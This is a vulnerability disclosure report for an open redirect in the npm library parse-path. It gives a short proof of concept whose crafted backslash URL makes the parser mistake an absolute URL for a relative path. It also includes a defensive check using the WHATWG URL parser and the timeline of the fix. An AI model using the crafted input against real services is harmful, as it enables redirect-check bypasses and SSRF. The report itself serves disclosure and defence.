Open Redirect in ionicabizau/parse-path

Valid

Reported on

Jul 8th 2021


✍️ Description

parse-path mishandles certain uses of backslash such as https:/\ and interprets the URI as a relative path. Browsers accept backslashes after the protocol and treat them as normal slashes, while parse-path sees a relative path. This will lead to SSRF attacks, open redirects, or other undesired behavior.

Similar to CVE-2021-27515, CVE-2021-27516

🕵️‍♂️ Proof of Concept

  1. Create the following PoC file:

```
// poc.js
var parsePath = require("parse-path")
var u = parsePath("https:/\/\/\github.com/foo/bar")
console.log(u)
```

  2. Execute the following commands in another terminal:

```
npm i parse-path # Install affected module
node poc.js #  Run the PoC
```

  3. Check the Output:

```
{
protocols: ["https"]
protocol: "https"
port: null
resource: ""
user: ""
pathname: "/github.com/foo/bar"
hash: ""
search: ""
href: "https:///github.com/foo/bar"
query: Object {}
}
```

💥 Impact

Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.
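
A defensive check for the parser mismatch described above, as an added example that is not part of the original report and not parse-path's code. APP_ORIGIN and the function names are hypothetical, and naiveIsRelative is a stand-in for any check that disagrees with browsers, not parse-path's actual logic.

```javascript
// Added example, not parse-path code. APP_ORIGIN and all function names
// here are hypothetical.
const APP_ORIGIN = "https://app.example";

// Weak check: anything without a literal "scheme://" prefix is assumed to be
// a relative path and therefore safe to redirect to.
function naiveIsRelative(target) {
  return !/^[a-z][a-z0-9+.-]*:\/\//i.test(target);
}

// Hardened check: resolve the target with the WHATWG URL parser, which treats
// "\" like "/" for http(s) as browsers do, then accept only our own origin.
// Returns a normalized same-origin path, or null if the target is rejected.
function safeRedirectTarget(target) {
  let url;
  try {
    url = new URL(target, APP_ORIGIN);
  } catch {
    return null; // unparseable input is rejected, never passed through
  }
  if (url.origin !== APP_ORIGIN) return null;
  return url.pathname + url.search + url.hash;
}

// Compare what a browser-compatible parser sees with what each check decides.
function classify(target) {
  return {
    target,
    browserHost: new URL(target, APP_ORIGIN).hostname,
    naiveSaysRelative: naiveIsRelative(target),
    safeTarget: safeRedirectTarget(target),
  };
}

// Constructed inputs: the two spellings from the report plus a benign path.
const samples = [
  "https:/\\github.com/foo/bar", // backslash after the protocol
  "https:///github.com/foo/bar", // href form shown in the PoC output
  "/account?tab=security#keys",  // genuine relative path
];

for (const s of samples) console.log(classify(s));
```

Redirecting to the returned path instead of the raw input means the browser never re-parses the user-supplied string.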

We have contacted a member of the ionicabizau/parse-path team and are waiting to hear back 2 years ago
Ionică Bizău (Johnny B.) validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Ionică (Maintainer), 2 years ago:

A fix would be very welcomed! Thank you very much for the report.

Ionică Bizău (Johnny B.) marked this as fixed in 5.0.0 with commit f9ad88 a year ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
This vulnerability will not receive a CVE